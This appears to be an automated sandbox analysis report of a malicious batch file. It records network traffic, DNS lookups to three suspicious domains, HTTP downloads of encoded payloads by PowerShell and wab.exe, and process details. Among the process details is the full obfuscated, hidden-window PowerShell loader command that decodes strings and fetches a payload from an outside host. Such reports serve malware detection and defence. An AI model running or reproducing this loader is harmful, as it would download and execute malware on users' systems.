                  Jul 11, 2024 13:12:03.371236086 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.371304035 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.371484995 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.371562004 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.372325897 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.372395992 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.409002066 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.409185886 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.617655039 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.617693901 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.617742062 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.617779970 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.618918896 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.618993044 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.619241953 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.619314909 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.619870901 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.619940996 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.620002031 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.620073080 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.620476007 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.620562077 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.620834112 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.620903969 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.622644901 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.622715950 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.622931957 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.623002052 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.623364925 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.623435974 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.623575926 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.623648882 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.623929024 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.623999119 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.624213934 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.624283075 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.661736012 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.661842108 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.661895990 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.661967039 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.874218941 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.874258041 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.874330997 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.874358892 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.874398947 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.874469042 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.874610901 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.874680996 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.874845028 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.874908924 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.875092030 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.875154972 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.875403881 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.875452042 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.875468016 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.875478029 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.875507116 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.875524998 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.875984907 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.876038074 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.876044035 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.876051903 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.876092911 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.876113892 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.876611948 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.876662016 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.876673937 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.876678944 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.876719952 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.876734018 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.877224922 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.877276897 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.877286911 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.877290964 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.877331018 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.877357006 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.877758980 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.877809048 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.877813101 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.877840996 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.877882957 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.881022930 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:42.120249987 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:42.120286942 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:42.120366096 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:42.129313946 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:42.129329920 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.066458941 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.066564083 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:52.130633116 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:52.130664110 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.131602049 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.131743908 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:52.134519100 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:52.180500984 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.513624907 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.513701916 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.513746023 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:52.513763905 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.513787985 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:52.513847113 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:52.692524910 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.692657948 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:52.693013906 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.693104982 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:52.694860935 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.694950104 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:52.732357979 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.732657909 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:52.869601011 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.869738102 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:52.870372057 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.870460033 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:52.870573997 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.870656967 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:52.871968031 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.872052908 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:52.872972012 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.873075962 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:52.873076916 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.873106956 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.873148918 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:52.873178005 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:52.909154892 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:52.909312963 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.254297018 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.254338026 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.254410982 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.254441977 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.254517078 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.254699945 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.254786015 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.254828930 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.254899025 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.254930019 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.254997969 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.255276918 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.255341053 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.255373955 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.255445004 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.262458086 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.262542009 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.262671947 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.262739897 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.263421059 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.263494015 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.263705969 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.263767958 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.264334917 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.264436960 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.264492035 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.264554977 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.265338898 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.265403986 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.265491962 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.265758038 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.266235113 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.266310930 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.266511917 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.266587019 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.267326117 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.267393112 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.267400980 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.267430067 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.267462969 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.267486095 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.268220901 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.268306971 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.268461943 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.268536091 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.268584967 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.268647909 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.268655062 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.268697977 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.268744946 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.268802881 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.269279957 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.269288063 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:13:26.016989946 CEST4971480192.168.2.5137.220.252.40
                  Jul 11, 2024 13:13:26.021913052 CEST8049714137.220.252.40192.168.2.5
                  Jul 11, 2024 13:13:26.022097111 CEST4971480192.168.2.5137.220.252.40
                  Jul 11, 2024 13:13:26.024619102 CEST4971480192.168.2.5137.220.252.40
                  Jul 11, 2024 13:13:26.029428005 CEST8049714137.220.252.40192.168.2.5
                  Jul 11, 2024 13:13:26.862310886 CEST8049714137.220.252.40192.168.2.5
                  Jul 11, 2024 13:13:26.862325907 CEST8049714137.220.252.40192.168.2.5
                  Jul 11, 2024 13:13:26.862334013 CEST8049714137.220.252.40192.168.2.5
                  Jul 11, 2024 13:13:26.862510920 CEST4971480192.168.2.5137.220.252.40
                  Jul 11, 2024 13:13:26.862510920 CEST4971480192.168.2.5137.220.252.40
                  Jul 11, 2024 13:13:26.865869999 CEST4971480192.168.2.5137.220.252.40
                  Jul 11, 2024 13:13:26.870922089 CEST8049714137.220.252.40192.168.2.5
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Jul 11, 2024 13:12:00.724746943 CEST | 57236 | 53 | 192.168.2.5 | 1.1.1.1
                  Jul 11, 2024 13:12:01.000530958 CEST | 53 | 57236 | 1.1.1.1 | 192.168.2.5
                  Jul 11, 2024 13:12:42.013803959 CEST | 54898 | 53 | 192.168.2.5 | 1.1.1.1
                  Jul 11, 2024 13:12:42.113394022 CEST | 53 | 54898 | 1.1.1.1 | 192.168.2.5
                  Jul 11, 2024 13:13:25.345397949 CEST | 52995 | 53 | 192.168.2.5 | 1.1.1.1
                  Jul 11, 2024 13:13:26.008534908 CEST | 53 | 52995 | 1.1.1.1 | 192.168.2.5
                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                  Jul 11, 2024 13:12:00.724746943 CEST | 192.168.2.5 | 1.1.1.1 | 0x5f64 | Standard query (0) | econstramedia.com | A (IP address) | IN (0x0001) | false
                  Jul 11, 2024 13:12:42.013803959 CEST | 192.168.2.5 | 1.1.1.1 | 0xa0e2 | Standard query (0) | tejarat-gram.com | A (IP address) | IN (0x0001) | false
                  Jul 11, 2024 13:13:25.345397949 CEST | 192.168.2.5 | 1.1.1.1 | 0x7773 | Standard query (0) | www.387mfyr.sbs | A (IP address) | IN (0x0001) | false
                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                  Jul 11, 2024 13:12:01.000530958 CEST | 1.1.1.1 | 192.168.2.5 | 0x5f64 | No error (0) | econstramedia.com | (none) | 103.211.216.55 | A (IP address) | IN (0x0001) | false
                  Jul 11, 2024 13:12:42.113394022 CEST | 1.1.1.1 | 192.168.2.5 | 0xa0e2 | No error (0) | tejarat-gram.com | (none) | 185.83.114.124 | A (IP address) | IN (0x0001) | false
                  Jul 11, 2024 13:13:26.008534908 CEST | 1.1.1.1 | 192.168.2.5 | 0x7773 | No error (0) | www.387mfyr.sbs | (none) | 137.220.252.40 | A (IP address) | IN (0x0001) | false
                  • econstramedia.com
                  • tejarat-gram.com
                  • www.387mfyr.sbs
                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  0 | 192.168.2.5 | 49714 | 137.220.252.40 | 80 | 3228 | C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 11, 2024 13:13:26.024619102 CEST | 456 | OUT | GET /abt9/?9Z=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtO4lYB4JWeqCW78ZirT3u+fANwUiQR/vajzHJfJfY/KmwIA==&et=y8bdBnFxh HTTP/1.1
                  Host: www.387mfyr.sbs
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Language: en-us
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                  Jul 11, 2024 13:13:26.862310886 CEST | 691 | IN | HTTP/1.1 404 Not Found
                  Server: nginx
                  Date: Thu, 11 Jul 2024 11:13:26 GMT
                  Content-Type: text/html
                  Content-Length: 548
                  Connection: close
                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  0 | 192.168.2.5 | 49704 | 103.211.216.55 | 443 | 4324 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Timestamp | Bytes transferred | Direction | Data
                  2024-07-11 11:12:02 UTC | 178 | OUT | GET /Teglbrnderier.snp HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                  Host: econstramedia.com
                  Connection: Keep-Alive
                  2024-07-11 11:12:02 UTC | 209 | IN | HTTP/1.1 200 OK
                  Date: Thu, 11 Jul 2024 11:12:02 GMT
                  Server: Apache
                  Upgrade: h2,h2c
                  Connection: Upgrade, close
                  Last-Modified: Tue, 09 Jul 2024 08:34:34 GMT
                  Accept-Ranges: bytes
                  Content-Length: 433500
                  Data Ascii: LYpeH5G7l0H56hwAO78qejuq+9a/MsyNmHmSWUTOGZDj5b735HW+2wZZdUAWb35h45wxesBP8LiAYtil45wNYxfAB0XhuxIbzWhTTeOdVb0I4X9L5CYNkmjKCJ4husIT5CUlOsZ9UTfEAAublY8Cjfr2dM81mMj1jauk+QTRc6aG56/zi5AMuzR8D0XgPGE975896f9oFmW3xmzNZ+yfHAgQ5mYP5/d1vWWtzB8hJ8WzMOM+3iPelrwO7MfNi+9
                  2024-07-11 11:12:03 UTC8000INData Raw: 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 49 4d 76 6a 43 41 41 63 46 4e 54 58 6e 6a 66 6d 2b 33 58 2f 43 32 43 34 6c 69 62 39 61 37 35 31 41 4b 56 44 6d 43 43 30 70 4d 73 4a 4a 6e 78 57 71 37 51 65 4f 64 6c 56 4c 70 59 67 33 43 56 31 49 49 71 32 34 66 6b 79 66 77 2f 67 6a 36 47 34 59 7a 6e 2b 52 41 48 72 50 71 64 67 69 62 36 41 4e 39 57 48 74 37 54 56 5a 53 42 4f 67 74 35 48 49 68 73 31 65 59 44 30 66 77 43 78 4e
                  Data Ascii: bAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAIMvjCAAcFNTXnjfm+3X/C2C4lib9a751AKVDmCC0pMsJJnxWq7QeOdlVLpYg3CV1IIq24fkyfw/gj6G4Yzn+RAHrPqdgib6AN9WHt7TVZSBOgt5HIhs1eYD0fwCxN
                  2024-07-11 11:12:03 UTC8000INData Raw: 4f 49 4d 74 51 53 41 4a 79 51 50 52 6d 41 2f 7a 36 6a 54 71 33 51 53 53 43 34 52 76 36 53 4d 61 2f 59 69 2f 54 65 4f 63 69 35 44 33 30 67 6c 52 55 35 51 50 52 58 35 32 62 4f 68 37 65 79 56 44 4e 79 77 48 52 65 4e 39 46 6c 41 57 42 68 68 6e 35 59 69 2f 54 65 4f 65 51 78 78 2b 62 56 47 34 39 67 4a 53 47 2b 52 6a 2f 30 58 6a 6e 44 46 56 67 51 67 44 52 4a 36 66 38 58 46 54 6c 41 39 45 4e 41 30 4d 57 65 45 73 4f 70 68 6c 6d 4b 78 58 42 78 68 74 51 53 43 66 79 34 6c 6c 6d 41 79 59 79 57 63 48 6f 73 4f 4b 42 44 4c 76 75 4c 71 2b 6c 4a 41 72 6f 6f 69 41 44 52 71 54 79 35 6c 53 67 5a 6a 4f 6e 68 32 32 71 55 59 4a 6e 67 75 47 6e 54 6d 39 51 2b 63 38 4f 2b 36 49 78 5a 56 43 43 35 4f 63 57 2f 51 51 43 30 58 68 68 51 2b 68 48 5a 71 34 79 65 65 63 44 35 58 2f 61 4c 72
                  Data Ascii: OIMtQSAJyQPRmA/z6jTq3QSSC4Rv6SMa/Yi/TeOci5D30glRU5QPRX52bOh7eyVDNywHReN9FlAWBhhn5Yi/TeOeQxx+bVG49gJSG+Rj/0XjnDFVgQgDRJ6f8XFTlA9ENA0MWeEsOphlmKxXBxhtQSCfy4llmAyYyWcHosOKBDLvuLq+lJArooiADRqTy5lSgZjOnh22qUYJnguGnTm9Q+c8O+6IxZVCC5OcW/QQC0XhhQ+hHZq4yeecD5X/aLr


                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                  1192.168.2.549712185.83.114.1244434820C:\Program Files (x86)\Windows Mail\wab.exe
                  Timestamp                Bytes transferred  Direction  Data
                  2024-07-11 11:12:52 UTC  184                OUT        GET /cyoeNvCnByBgIccf106.bin HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                  Host: tejarat-gram.com
                  Cache-Control: no-cache
                  2024-07-11 11:12:52 UTC  241                IN         HTTP/1.1 200 OK
                  Date: Thu, 11 Jul 2024 11:12:52 GMT
                  Server: Apache
                  Last-Modified: Tue, 09 Jul 2024 08:27:41 GMT
                  Accept-Ranges: bytes
                  Content-Length: 269888
                  Vary: User-Agent
                  Connection: close
                  Content-Type: application/octet-stream



                  Target ID: 0
                  Start time: 07:11:57
                  Start date: 11/07/2024
                  Path: C:\Windows\System32\cmd.exe
                  Wow64 process (32bit): false
                  Commandline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rFV-452747284IN.bat" "
                  Imagebase: 0x7ff7addf0000
                  File size: 289'792 bytes
                  MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Reputation: high
                  Has exited: true

                  Target ID: 1
                  Start time: 07:11:57
                  Start date: 11/07/2024
                  Path: C:\Windows\System32\conhost.exe
                  Wow64 process (32bit): false
                  Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase: 0x7ff6d64d0000
                  File size: 862'208 bytes
                  MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges: true
                  Has administrator privileges: true
                  Programmed in: C, C++ or other language
                  Reputation: high
                  Has exited: true

                  Target ID: 2
                  Start time: 07:11:57
                  Start date: 11/07/2024
                  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit): false
                  Commandline:powershell.exe -windowstyle hidden "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners';If (${host}.CurrentCulture) {$Cabalismsbryderens++;}Function Antikvitetsforretnings($Rodfunktionerne){$Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;$Sinecural='SUBsTR';$Sinecural+='ing';For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){$Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}$Decisionen;}function Unthrust($Meagrely){ . ($Eksperter) ($Meagrely);}$Antoninas=Antikvitetsforretnings 'DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc .ul(UbehW Ae,istrinConvd HanoFr kwNyvlsDiat EmbrNTocoT Gli Conv1 ,dd0Klip.Sena0Bald; S h ForeWR,triRe,ongenn6S,ol4 Opt;.avi Strx,erm6Mod,4Stal; Far BaglrOstevSla,:Inqi1akti2 Fed1.mrk. 
g,t0,esk)Kamg DebGNatie,atrcskank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0.ini1atla0Ek,k1,nth UdliFTizwiCadirAlomeGenaf,oreoegesxA,at/Omr.1ma,d2Vol 1 Unr.Fort0Home ';$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';$Udarte=Antikvitetsforretnings 'Hytt>Sony ';$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';$Arabin='Granden';$Martinetishness = Antikvitetsforretnings 'Vande H.wcAabehroeroUdtr Dec%S,lda B,upReg,pOv,rd Ek.aProvtD.coaDung%Cavi\,uviCkontoPreduKonsm niaAut rA bea F rtUnheeWelf. autBBe.aiD bbcAl m Sta&Mask& ual heale Ti.c Pl,hVippo Biv SynttL uc ';Unthrust (Antikvitetsforretnings 'Maxi$Em,og .ncl B ioH.rsbSlutaIntel Pol:It,mM,opeeDru.tBegialendl OstiTeltsSkrumSwad= Oms(Reloc.sonmAntedFore Sage/EmbacZibe Efte$DeprMP,ntaUdfrrB,sittissiZircnTu.sePosstSkovi sa 